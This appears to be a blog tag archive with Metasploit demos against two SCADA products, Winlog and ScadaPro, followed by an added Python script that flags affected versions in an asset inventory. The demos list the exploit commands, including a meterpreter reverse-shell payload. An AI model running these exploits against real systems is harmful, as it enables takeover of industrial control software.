Tag Archives: SCADA

Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo

Timeline :

Vulnerability discovered by m-1-k-3 on 2012-06-03
Public release of the vulnerability on 2012-06-04
Metasploit PoC provided on 2012-06-07

PoC provided by :

m-1-k-3

Reference(s) :

EDB-ID-18986
BID-53811

Affected version(s) :

Sielco Sistemi Winlog versions up to and including 2.07.14

Tested on Windows XP Pro SP3 with :

Sielco Sistemi Winlog 2.07.14

Description :

This module exploits a buffer overflow in Sielco Sistemi Winlog versions up to and including 2.07.14. By sending a specially formatted packet to the Runtime.exe service listening on port 46824, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 46824 192.168.178.22

exploit

getuid
sysinfo

EDB-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability on 2011-09-13
Metasploit PoC provided on 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro versions before 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitrary commands on the affected system by abusing a directory traversal in the ‘xf’ (execute function) command. An attacker can invoke system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo
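The two entries above each state an affected version range (Winlog up to and including 2.07.14, ScadaPro before 4.0.1) and, for Winlog, the listening port of the vulnerable service. The following Python is an added example, not code from either Metasploit module or from the vendors: it turns those two ranges into a small triage check that a defender can run over an asset inventory, comparing versions numerically (so that 2.07.14 and 2.7.14 are equal and 2.10 sorts after 2.9) and flagging Winlog hosts whose Runtime.exe port 46824 is reachable. The inventory records and host addresses are constructed sample data; the dictionary layout and the ScadaPro entries' ports are assumptions, since the posts do not give a ScadaPro listening port.

```python
"""Added example (not part of the original posts): flag inventory hosts whose
SCADA software falls inside the affected ranges quoted in the two entries.
All inventory data below is constructed for illustration."""

# Affected ranges as stated in the posts: (upper bound, bound is inclusive?)
AFFECTED = {
    "Winlog": ("2.07.14", True),   # "before or equal to version 2.07.14"
    "ScadaPro": ("4.0.1", False),  # "before version 4.0.1"
}

# Port of the Winlog Runtime.exe service named in the first entry.
WINLOG_RUNTIME_PORT = 46824


def parse_version(text):
    """Turn '2.07.14' or '3.9.15.0' into a tuple of ints so comparison is
    numeric rather than lexical ('2.07.14' == '2.7.14', '2.10' > '2.9')."""
    return tuple(int(part) for part in text.strip().split("."))


def cmp_versions(a, b):
    """Three-way compare two version tuples, zero-padding the shorter one so
    that '3.1.9' and '3.1.9.0' compare equal. Returns -1, 0 or 1."""
    width = max(len(a), len(b))
    a = a + (0,) * (width - len(a))
    b = b + (0,) * (width - len(b))
    return (a > b) - (a < b)


def is_affected(product, version):
    """True if the product/version pair lies inside a range from AFFECTED."""
    if product not in AFFECTED:
        return False
    bound, inclusive = AFFECTED[product]
    c = cmp_versions(parse_version(version), parse_version(bound))
    return c < 0 or (inclusive and c == 0)


def triage(inventory):
    """Return {host: reason} for every inventory record in an affected range.
    For Winlog, note when the Runtime.exe port is exposed on the network, which
    is the condition under which the overflow is remotely reachable."""
    findings = {}
    for asset in inventory:
        if not is_affected(asset["product"], asset["version"]):
            continue
        reason = f"{asset['product']} {asset['version']} is in the affected range"
        if asset["product"] == "Winlog" and WINLOG_RUNTIME_PORT in asset.get("exposed_ports", []):
            reason += f"; Runtime.exe service on TCP/{WINLOG_RUNTIME_PORT} is network-reachable"
        findings[asset["host"]] = reason
    return findings


# Constructed sample inventory (hosts, versions and port lists are made up).
INVENTORY = [
    {"host": "10.0.0.5", "product": "Winlog", "version": "2.07.14", "exposed_ports": [46824]},
    {"host": "10.0.0.6", "product": "Winlog", "version": "2.07.15", "exposed_ports": [46824]},
    {"host": "10.0.0.7", "product": "ScadaPro", "version": "3.9.15.0", "exposed_ports": []},
    {"host": "10.0.0.8", "product": "ScadaPro", "version": "4.0.1", "exposed_ports": []},
]

if __name__ == "__main__":
    for host, reason in triage(INVENTORY).items():
        print(f"{host}: {reason}")
```

Only 10.0.0.5 (Winlog at the inclusive upper bound, with port 46824 exposed) and 10.0.0.7 (ScadaPro 3.9.15.0) are reported; the patched-version hosts are not. The numeric comparison matters because a plain string comparison would wrongly rank "2.07.14" below "2.7.14" and "2.10.0" below "2.9.0".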